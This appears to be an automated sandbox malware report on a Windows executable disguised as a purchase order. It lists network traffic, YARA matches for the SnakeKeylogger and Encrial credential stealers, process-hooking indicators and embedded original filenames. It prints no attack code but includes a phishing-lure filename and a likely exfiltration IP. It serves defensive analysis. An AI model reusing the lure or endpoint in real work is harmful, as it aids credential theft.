Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 54966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54968
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54966
Source: unknown	Network traffic detected: HTTP traffic on port 54968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:54971 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_03163E1C	0_2_03163E1C
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_057987E0	0_2_057987E0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05791AE4	0_2_05791AE4
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_057987D0	0_2_057987D0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05792218	0_2_05792218
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05792208	0_2_05792208
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05791458	0_2_05791458
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05793DD0	0_2_05793DD0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_058744E0	0_2_058744E0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_0587661E	0_2_0587661E
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05871A90	0_2_05871A90
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_058714D0	0_2_058714D0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_058714E0	0_2_058714E0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05879263	0_2_05879263
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05873A78	0_2_05873A78
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280D278	4_2_0280D278
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_02805370	4_2_02805370
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280C146	4_2_0280C146
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280C738	4_2_0280C738
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280C468	4_2_0280C468
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280CA08	4_2_0280CA08
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280E988	4_2_0280E988
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_028069A0	4_2_028069A0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_028029E0	4_2_028029E0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280CFA9	4_2_0280CFA9
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_02806FC8	4_2_02806FC8
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280CCD8	4_2_0280CCD8
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_02809DE0	4_2_02809DE0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280F979	4_2_0280F979
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280E97A	4_2_0280E97A
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_02803E09	4_2_02803E09
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A9668	4_2_066A9668
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A5148	4_2_066A5148
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A1FA8	4_2_066A1FA8
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A9D90	4_2_066A9D90
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A2A90	4_2_066A2A90
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A1850	4_2_066A1850
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AD660	4_2_066AD660
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AD670	4_2_066AD670
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AE7CF	4_2_066AE7CF
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AE7D0	4_2_066AE7D0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A9448	4_2_066A9448
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AF4D8	4_2_066AF4D8
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AD218	4_2_066AD218
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AE36A	4_2_066AE36A
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AE378	4_2_066AE378
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AF071	4_2_066AF071
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A0040	4_2_066A0040
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A003F	4_2_066A003F
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AF080	4_2_066AF080
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A5138	4_2_066A5138
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066ADF20	4_2_066ADF20
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066ADF1F	4_2_066ADF1F
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A1F9B	4_2_066A1F9B
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AEC28	4_2_066AEC28
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AEC18	4_2_066AEC18
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A8CC0	4_2_066A8CC0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A8CB1	4_2_066A8CB1
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A9D29	4_2_066A9D29
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066ACDC0	4_2_066ACDC0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066ACDAF	4_2_066ACDAF
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066ADAC8	4_2_066ADAC8
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066ADAB9	4_2_066ADAB9
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A0B20	4_2_066A0B20
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A0B30	4_2_066A0B30
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A1841	4_2_066A1841
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AF922	4_2_066AF922
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066AF930	4_2_066AF930

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 2428

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000000.1103341423.0000000000E6E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameucxt.exe8 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.000000000359A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1139642245.00000000077D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1135188484.000000000147E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.00000000034A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.000000000344C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1139042622.0000000005C80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Binary or memory string: OriginalFilenameucxt.exe8 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
